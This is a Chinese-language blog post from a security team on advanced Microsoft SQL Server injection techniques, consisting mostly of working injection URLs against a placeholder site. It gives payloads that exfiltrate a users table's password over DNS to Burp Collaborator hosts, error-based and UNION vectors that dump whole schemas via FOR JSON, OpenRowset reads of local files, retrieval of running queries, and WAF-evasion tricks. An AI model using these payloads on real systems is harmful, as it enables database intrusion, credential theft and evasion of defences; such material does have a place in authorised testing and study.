高级 MSSQL 注入技巧

原创

Khan安全团队

发布于 2022-01-04 10:59:59

2K0

发布于 2022-01-04 10:59:59

文章被收录于专栏：Khan安全团队

列出了改进 MSSQL 注入利用的几种技术。所有向量都至少在三个最新版本的 Microsoft SQL Server 上进行了测试：2019、2017、2016SP2。

DNS 带外

如果与完全盲SQL注入与面对禁用堆查询，它' S可能经由功能实现DNS出的带外（OOB）数据泄露fn_xe_file_target_read_file，fn_get_audit_file和 fn_trace_gettable。

fn_xe_file_target_read_file() 例子：

https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))

权限：需要服务器上的 VIEW SERVER STATE 权限。

fn_get_audit_file() 例子：

https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))

权限：需要 CONTROL SERVER 权限。

fn_trace_gettable() 例子：

https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))

权限：需要 CONTROL SERVER 权限。

替代的基于错误的向量

基于错误的 SQL 注入通常类似于诸如 «+AND+1=@@version–» 和基于 «OR» 运算符的变体之类的结构。包含此类表达式的查询通常会被 WAF 阻止。作为一种绕过，使用 %2b 字符将字符串与特定函数调用的结果连接起来，这些函数调用会在需要的数据上触发数据类型转换错误。

此类函数的一些示例：

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

函数的使用示例USER_NAME()：

https://vuln.app/getItem?id=1'%2buser_name(@@version)--

快速利用：在一个查询中检索整个表

有两种简单的方法可以在一个查询中检索表的全部内容 — 使用 FOR XML 或 FOR JSON 子句。FOR XML 子句需要指定的模式，例如 «raw»，因此在简洁性方面 FOR JSON 优于它。

从当前数据库中检索架构、表和列的查询：

https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--

基于错误的向量需要别名或名称，因为没有两者的表达式的输出无法格式化为 JSON。

https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--

读取本地文件

C:\Windows\win.ini使用函数 OpenRowset()检索本地文件的示例：

https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null

基于误差的向量：

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

权限： BULK 选项需要 ADMINISTER BULK OPERATIONS 或 ADMINISTER DATABASE BULK OPERATIONS 权限。

检索当前查询

当前执行的SQL查询可以访问检索sys.dm_exec_requests和sys.dm_exec_sql_text：

https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null

权限：如果用户在服务器上有VIEW SERVER STATE权限，用户将看到SQL Server实例上所有正在执行的会话；否则，用户将只能看到当前会话。

WAF绕过的小技巧

非标准空白字符：%C2%85 или %C2%A0：

https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--

用于混淆 UNION 的科学 (0e) 和十六进制 (0x) 符号：

https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
 
https://vuln.app/getItem?id=0xunion+select+null,@@version,null--

FROM 和列名之间的句点而不是空格：

https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--

\N SELECT 和一次性列之间的分隔符：

https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

sql

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

登录后参与评论

0 条评论

热度